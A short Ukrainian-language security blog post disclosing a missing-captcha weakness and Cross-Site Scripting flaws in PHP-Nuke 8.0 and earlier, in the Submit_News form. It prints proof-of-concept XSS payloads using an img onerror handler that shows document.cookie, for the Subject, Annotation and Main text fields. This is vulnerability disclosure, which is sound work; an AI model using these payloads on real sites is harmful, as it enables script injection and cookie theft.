Нові уразливості в PHP-Nuke
15:06 09.03.201114.01.2011
У жовтні, 26.10.2010, я знайшов Insufficient Anti-automation та Cross-Site Scripting уразливості в PHP-Nuke. Які я виявив на одному сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам.
Раніше я вже писав про уразливості в PHP-Nuke.
Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.
09.03.2011
Insufficient Anti-automation:
http://site/modules.php?name=Submit_News
В формі немає захисту від автоматизованих запитів (капчі).
XSS:
http://site/modules.php?name=Submit_News
"><img src='’ onerror="javascript:alert(document.cookie)
В полі Тема.
<img src='’ onerror="javascript:alert(document.cookie)">
В полях Анотація та Основний текст статті. Спрацює при використанні TinyMCE в формі.
Уразливі PHP-Nuke 8.0 та попередні версії.